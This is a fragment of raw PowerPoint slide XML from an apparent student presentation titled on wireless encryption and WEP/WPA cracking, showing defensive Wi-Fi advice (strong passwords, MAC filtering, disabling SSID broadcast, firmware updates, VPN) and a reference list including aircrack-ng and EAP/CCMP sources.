                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-130" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="30" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-285" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-215" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="105" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="25" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" spc="25" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-10" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>passwords, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" spc="-10" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="114" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="15" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>address </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="5" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="35" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-380" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-215" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" spc="-215" dirty="0">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="5080" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="1167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sz="3000" spc="110" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="240" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e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spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="70" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r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spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n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spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a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spc="240" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>l  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>location </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-70" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="5" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>disable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>SSID </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" i="1" spc="-45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>broadcasting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" spc="-45" dirty="0">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="5080" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="1167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lang="en-US" sz="3000" spc="-45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Keep router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" spc="-45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>firmware up to date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" spc="-45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>and use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" spc="-45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>VPN</a:t>
            </a:r>
            <a:endParaRPr sz="3000" i="1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019300"/>
            <a:ext cx="1401210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2"/>
              </a:rPr>
              <a:t>EC-Council Certifications | Best Cybersecurity Courses &amp; Training (eccouncil.org)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.aircrack-ng.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.freecodecamp.org/news/wi-fi-hacking-101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Extensible Authentication Protocol – Wikipedia</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>What is a pre-shared key (PSK)? | Doctor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>EnGenius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> Help Center (engeniustech.com)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>What is CCMP? - Information Security Asia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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2820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C194B7F-ECA6-99F8-C409-30C1557482D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2133600" y="2628900"/>
            <a:ext cx="13780485" cy="5457065"/>
            <a:chOff x="3669315" y="2414967"/>
            <a:chExt cx="13780485" cy="5457065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7E0796F-7317-EB30-BDD5-CD36EEE3AFBC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5826347" y="2414967"/>
              <a:ext cx="11623453" cy="5457065"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 8563737"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 4314063"/>
                <a:gd name="connsiteX1" fmla="*/ 6406706 w 8563737"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 4314063"/>
                <a:gd name="connsiteX2" fmla="*/ 8563737 w 8563737"/>
                <a:gd name="connsiteY2" fmla="*/ 2157032 h 4314063"/>
                <a:gd name="connsiteX3" fmla="*/ 6406706 w 8563737"/>
                <a:gd name="connsiteY3" fmla="*/ 4314063 h 4314063"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 8563737"/>
                <a:gd name="connsiteY4" fmla="*/ 4314063 h 4314063"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 8563737"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 4314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63737" h="4314063">
                  <a:moveTo>
                    <a:pt x="8563737" y="4314063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2157031" y="4314063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2157031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157031" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8563737" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8563737" y="431406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0898" tIns="179071" rIns="334264" bIns="179071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6000" kern="1200" dirty="0"/>
                <a:t>Thanks for listening to my  presentation on WEP and  WPA cracking. </a:t>
              </a:r>
            </a:p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6000" kern="1200" dirty="0"/>
                <a:t>Stay Safe and  Secure Online!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3F1FC5B-20B1-682B-DED3-079E0CDEADE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3669315" y="2414968"/>
              <a:ext cx="4314063" cy="4314063"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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F8B42DA-A3DF-5AD5-3932-9AFB3CAE6E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3940342"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3048000" y="1079500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A98AD9-079D-3708-66F8-AB3D97D7FC03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="419100"/>
            <a:ext cx="518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Wireless Networks</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="44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AF25B4-B193-1285-6BC6-59FEE1D617B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758" y="290101"/>
            <a:ext cx="769442" cy="7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1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8880" y="1164951"/>
            <a:ext cx="10445750" cy="7952423"/>
            <a:chOff x="1318880" y="1526425"/>
            <a:chExt cx="10445750" cy="72294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5324" y="1526425"/>
              <a:ext cx="8648699" cy="72294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18880" y="3264789"/>
              <a:ext cx="6551295" cy="3757929"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6551295" h="3757929">
                  <a:moveTo>
                    <a:pt x="5575737" y="3757421"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="215155" y="3757421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165822" y="3751743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120535" y="3735568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80586" y="3710188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47267" y="3676893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21868" y="3636974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5682" y="3591720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3542423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="214998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5682" y="165701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21868" y="120447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47267" y="80527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80586" y="47232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120535" y="21852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165822" y="5678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215155" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6336062" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6378232" y="4169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6418398" y="16365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6455430" y="36122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6488200" y="62971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6515069" y="95717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6534839" y="132722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6547045" y="172858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6551217" y="214998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6551217" y="1260875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6545746" y="1304166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6530209" y="1343558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6505922" y="1377610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6474201" y="1404881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6436360" y="1423932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6351072" y="1442711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6313231" y="1461762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6281510" y="1489033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6257223" y="1523085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6241686" y="1562476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6236215" y="1605768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6236215" y="2380373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6232043" y="2422513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6219837" y="2462649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6200066" y="2499654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6173198" y="2532400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6140428" y="2559249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6103396" y="2579005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6063230" y="2591202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6021059" y="2595371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6006049" y="2595371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5956715" y="2601049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5911429" y="2617224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5871480" y="2642604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5838160" y="2675899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5812761" y="2715819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5796575" y="2761072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5790893" y="2810370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5790893" y="3542423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5786720" y="3584563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5774515" y="3624699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5754744" y="3661704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5727875" y="3694450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5695106" y="3721299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5658074" y="3741055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5617908" y="3753252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5575737" y="37574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539523" y="3359150"/>
            <a:ext cx="6105525" cy="351536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9150"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="229"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="7650" b="1" spc="-1405" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="-125" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="-135" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="-185" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="325" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>du</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="805" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="-135" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="-185" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="325" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="-80" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>n  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="95" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="315" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="-2230" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7650" b="1" spc="60" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Encryption</a:t>
            </a:r>
            <a:endParaRPr sz="765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27705" y="2673350"/>
            <a:ext cx="3582035" cy="482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3000" spc="40" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="240" dirty="0">
                <a:latin typeface="Verdana"/>
